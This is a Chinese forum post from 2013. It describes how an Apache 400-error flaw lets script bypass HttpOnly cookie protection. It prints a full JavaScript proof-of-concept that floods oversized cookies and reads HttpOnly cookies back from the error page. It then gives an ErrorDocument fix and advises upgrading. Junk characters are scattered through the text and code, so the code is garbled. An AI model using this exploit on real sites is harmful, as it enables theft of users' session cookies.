很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
% l9 C1 x9 k2 E2 x
$ f2 u1 e& y4 j9 ~ E用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
n3 N/ f$ \/ S0 @8 ~6 E/ s# h $ N* Q; r9 K4 M& O. C3 X8 f$ l
+ n4 G& L" L5 ~( K: H A0 Y
// http://www.exploit-db.com/exploits/18442/
7 H: |3 |( ?/ ?function setCookies (good) {% D' k& `; g$ t0 S6 R. f# a! s
// Construct string for cookie value
: ~) d( D8 k& Z# yvar str = "";
* t1 \% O( S2 X7 L* C/ n4 qfor (var i=0; i< 819; i++) {
$ I% x0 t- n3 ?) d2 ostr += "x";& d& ~/ h) X2 _0 V& U; a
}
8 c( ~+ u* y7 C. N# v- n// Set cookies# c9 C$ |% |( Q6 ?, s7 z
for (i = 0; i < 10; i++) {6 O$ V6 o! j& E+ ?
// Expire evil cookie7 j0 W4 l+ @- I3 j1 K. b. J' F
if (good) {1 s, I" ]% `- W
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
. Q3 E7 N. x( Q8 I}
3 {2 z e# j3 Q9 L1 Q- h// Set evil cookie# U( @) C: M8 m2 C9 _8 c
else {
* i0 y) o$ j. w9 y* A. f) qvar cookie = "xss"+i+"="+str+";path=/";
" M( O# J. X$ g}
2 B, ? R0 f0 Y* k, x' q$ Kdocument.cookie = cookie; j, z; o: y& ?1 Y$ B) h: {# ~
}/ T8 r' g- B7 v4 ]7 g9 C
}
% I' z5 i# G( I! Lfunction makeRequest() {
. J. f) E9 j6 I$ L" B2 asetCookies();7 s, X- j" `. L6 L5 r) V$ n5 k
function parseCookies () {6 u. L/ `4 b# X: x; h8 D: [
var cookie_dict = {};
3 {0 A% T" x+ x$ R* E2 }. W9 v// Only react on 400 status) n" h9 l y2 }8 B+ t! ?7 C
if (xhr.readyState === 4 && xhr.status === 400) {. U) x, Q0 D4 J4 ? k" q7 ]
// Replace newlines and match <pre> content
& L3 G X' u1 N7 }+ evar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
5 i' Y6 T, d y* dif (content.length) {* r H+ M1 G) \) t4 M
// Remove Cookie: prefix
6 X! b) g) q. P% I% K: ]% f5 s" Mcontent = content[1].replace("Cookie: ", "");; p: h# H2 U+ v: M3 L* Q3 |% l
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
h: c, B3 \: R. [/ k// Add cookies to object# N* V8 E9 H+ S6 J H$ ]5 }! u! r
for (var i=0; i<cookies.length; i++) {- @: J. o& j( @, {/ \& P
var s_c = cookies.split('=',2);, [; ^+ [: C5 F. v [
cookie_dict[s_c[0]] = s_c[1];
& {; D! ^/ v0 F. R+ B6 C" v- Q$ r}7 }) b0 k4 |5 N& {8 ^' Q
}3 |% P' H. t5 q5 m: B
// Unset malicious cookies6 v8 n' R. i, N3 l8 D
setCookies(true);5 z) l, M6 `. R+ p9 Y4 R
alert(JSON.stringify(cookie_dict));
+ U. |& c# D& ~3 o7 n}
: N- ^9 p5 L; w" m) y! y4 y3 I6 _}3 |* Z/ v7 d$ I1 `# M D
// Make XHR request
. h E" x9 |8 L6 i, Q3 N, z; Svar xhr = new XMLHttpRequest();
. ?% ?- y1 E2 Txhr.onreadystatechange = parseCookies;
7 t8 @! J! X! l7 h; pxhr.open("GET", "/", true);
' f8 `( t, Q2 w7 g# Cxhr.send(null);: B5 @4 \: n2 h$ f% y6 [" i
}
! Z' b' h! ?9 E c( E6 C; KmakeRequest();
! S/ ?+ _( J. j3 i8 K( k2 D
* b7 y3 o4 A7 S7 d你就能看见华丽丽的400错误包含着cookie信息。! l% h, r. e3 {4 B" P! n
/ L9 t/ ]9 h) Z0 g
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#; I& N3 z, U' b6 l% a. ^
z6 ? T8 s6 i修复方案:
$ w; v: L$ e" D
( T' U o' o( Q* ~3 hApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下- o7 M, T* E$ E; A
" S& k& n% B* m+ D( h8 ]In the event of a problem or error, Apachecan be configured to do one of four things,
; L+ J6 T" C9 i+ i. @' B4 T. k+ M; ?- n0 g- Y
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
' x1 u z! V. D, s5 W" _. e2. output acustomized message输出一段信息! I3 b5 ~1 w- M) O Q
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 # {5 v9 ~* f) P: U8 Y
4. redirect to an external URL to handle theproblem/error转向一个外部URL
9 o* ]- _1 m; a4 ?7 ?3 u1 O' }
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容# }1 F8 n' J6 b) `4 k
2 L8 C! P9 d/ l6 t$ m. C% o6 qApache配置:
( K" z# c5 l% q' w, n7 l9 E. X
3 Z- _/ A- C6 h/ x4 vErrorDocument400 " security test"5 T5 @: u& _* w) h4 [) z% i
8 X/ c5 m6 {0 c当然,升级apache到最新也可:)。
4 u; }+ ?+ d( M4 B: i4 W" Y ~9 q# b9 i
参考:http://httpd.apache.org/security/vulnerabilities_22.html; T, }( k9 C9 M$ S
- A' V" t) O& [- [ |
发表于 2013-4-19 19:15:43
收藏
支持
反对